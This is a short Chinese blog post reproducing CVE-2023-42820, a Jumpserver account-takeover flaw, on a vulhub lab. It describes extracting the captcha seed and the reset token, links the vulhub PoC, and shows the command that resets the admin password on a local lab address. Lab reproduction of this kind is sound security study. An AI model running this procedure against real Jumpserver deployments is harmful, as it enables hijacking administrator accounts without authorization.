Jumpserver -(CVE-2023-42820)
Jumpserver随机数种子泄露导致账户劫持漏洞(CVE-2023-42820)
- 靶场环境: vulhub
- 在其3.6.4及以下版本中,存在一处账户接管漏洞。攻击者通过第三方库django-simple-captcha泄露的随机数种子推算出找回密码时的用户Token,最终修改用户密码。
复现
- 点击忘记密码
- 点击验证码,右键新窗口打开
- 得到伪随机数种子
seed
1 | http://192.168.72.129:8080/core/auth/captcha/image/2aafd36176af0093fdb48a54bfae6657648db09a/ |
- 回到忘记密码位置
- 填写用户名验证码,本次用户名为
admin
- 得到随机的
token
值
利用过程
- 根据vulhub靶场内攻击
1 | https://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/poc.py |
- 开始利用
-t
指定目标Jumpserver服务器地址--seed
前面记下来的随机数种子(seed)--token
前面记下来的token值(token)
1 | python jumperserver-2023.py -t http://192.168.72.129:8080 --email admin@mycomany.com --seed cec353dc91e6b6d46b8d536371c76ecf38a2ddee --token 0DuVLwUfvfFfVMJdtmSAC3h6nBBvyUNTpktB |
- 至此就可以修改
admin
的密码了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!